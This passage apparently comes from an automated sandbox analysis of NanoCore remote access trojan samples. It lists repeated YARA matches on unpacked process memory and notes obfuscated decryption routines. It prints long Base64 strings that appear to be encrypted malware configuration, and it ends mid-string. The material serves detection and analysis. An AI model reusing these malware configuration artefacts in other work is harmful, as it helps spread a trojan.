            Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.4a60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.4a60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.dhcpmon.exe.3223dc4.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.3223dc4.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.27f1774.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.27f1774.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: dhcpmon.exe.4.drStatic PE information: Section: .rsrc ZLIB complexity 0.999787946429
            Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: dhcpmon.exe.4.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
            Source: dhcpmon.exe.4.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
            Source: ame.exe.1.dr, Client/Settings.csBase64 encoded string: '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
            Source: Notepads.exe.3.dr, Client/Settings.csBase64 encoded string: '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
            Source: 3.2.ame.exe.500000.0.unpack, Client/Settings.csBase64 encoded string: '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', 